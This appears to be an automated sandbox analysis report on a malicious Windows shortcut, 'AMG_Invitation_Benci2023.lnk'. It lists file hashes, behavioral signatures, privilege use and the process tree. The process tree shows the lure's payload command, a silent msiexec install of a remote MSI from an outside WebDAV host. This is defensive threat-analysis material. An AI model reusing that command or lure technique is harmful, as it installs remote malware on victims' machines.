Analysis
-
max time kernel
118s -
max time network
126s -
platform
windows7_x64 -
resource
win7-20230712-en -
resource tags
arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system -
submitted
31/08/2023, 02:51
Static task
static1
Behavioral task
behavioral1
Sample
AMG_Invitation_Benci2023.lnk
Resource
win7-20230712-en
5 signatures
150 seconds
Behavioral task
behavioral2
Sample
AMG_Invitation_Benci2023.lnk
Resource
win10v2004-20230703-en
5 signatures
150 seconds
General
-
Target
AMG_Invitation_Benci2023.lnk
-
Size
1KB
-
MD5
6b0a6865586656afd56a14ad525b3c51
-
SHA1
dc21fd55db7b1d39915a7a27fb7551cadca7be57
-
SHA256
50fbb29db14c035f8483b67fa97291afcfd4c464b0cbe363b311ff58330c2570
-
SHA512
c2e5b0fec0e29dade8ddcbe7a0d27af14602010b97230b95c9b7a9eac2413f9af852e76cc11ff0d41a77c18d85e7a4bef51222c9ba1d28a7c4e51f739ef1bcf9
Score
7/10
Malware Config
Signatures
-
Use of msiexec (install) with remote resource 1 IoCs
pid Process 2892 msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2892 msiexec.exe -
Suspicious use of AdjustPrivilegeToken 34 IoCs
description pid Process Token: SeShutdownPrivilege 2892 msiexec.exe Token: SeIncreaseQuotaPrivilege 2892 msiexec.exe Token: SeRestorePrivilege 2800 msiexec.exe Token: SeTakeOwnershipPrivilege 2800 msiexec.exe Token: SeSecurityPrivilege 2800 msiexec.exe Token: SeCreateTokenPrivilege 2892 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2892 msiexec.exe Token: SeLockMemoryPrivilege 2892 msiexec.exe Token: SeIncreaseQuotaPrivilege 2892 msiexec.exe Token: SeMachineAccountPrivilege 2892 msiexec.exe Token: SeTcbPrivilege 2892 msiexec.exe Token: SeSecurityPrivilege 2892 msiexec.exe Token: SeTakeOwnershipPrivilege 2892 msiexec.exe Token: SeLoadDriverPrivilege 2892 msiexec.exe Token: SeSystemProfilePrivilege 2892 msiexec.exe Token: SeSystemtimePrivilege 2892 msiexec.exe Token: SeProfSingleProcessPrivilege 2892 msiexec.exe Token: SeIncBasePriorityPrivilege 2892 msiexec.exe Token: SeCreatePagefilePrivilege 2892 msiexec.exe Token: SeCreatePermanentPrivilege 2892 msiexec.exe Token: SeBackupPrivilege 2892 msiexec.exe Token: SeRestorePrivilege 2892 msiexec.exe Token: SeShutdownPrivilege 2892 msiexec.exe Token: SeDebugPrivilege 2892 msiexec.exe Token: SeAuditPrivilege 2892 msiexec.exe Token: SeSystemEnvironmentPrivilege 2892 msiexec.exe Token: SeChangeNotifyPrivilege 2892 msiexec.exe Token: SeRemoteShutdownPrivilege 2892 msiexec.exe Token: SeUndockPrivilege 2892 msiexec.exe Token: SeSyncAgentPrivilege 2892 msiexec.exe Token: SeEnableDelegationPrivilege 2892 msiexec.exe Token: SeManageVolumePrivilege 2892 msiexec.exe Token: SeImpersonatePrivilege 2892 msiexec.exe Token: SeCreateGlobalPrivilege 2892 msiexec.exe -
Suspicious use of WriteProcessMemory 5 IoCs
description pid Process procid_target PID 2596 wrote to memory of 2892 2596 cmd.exe 28 PID 2596 wrote to memory of 2892 2596 cmd.exe 28 PID 2596 wrote to memory of 2892 2596 cmd.exe 28 PID 2596 wrote to memory of 2892 2596 cmd.exe 28 PID 2596 wrote to memory of 2892 2596 cmd.exe 28
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\AMG_Invitation_Benci2023.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2596 -
C:\Windows\System32\msiexec.exe"C:\Windows\System32\msiexec.exe" /i \\view.file-cdn.cloud\DavWWWRoot\1.msi /qn2⤵
- Use of msiexec (install) with remote resource
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
PID:2892
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2800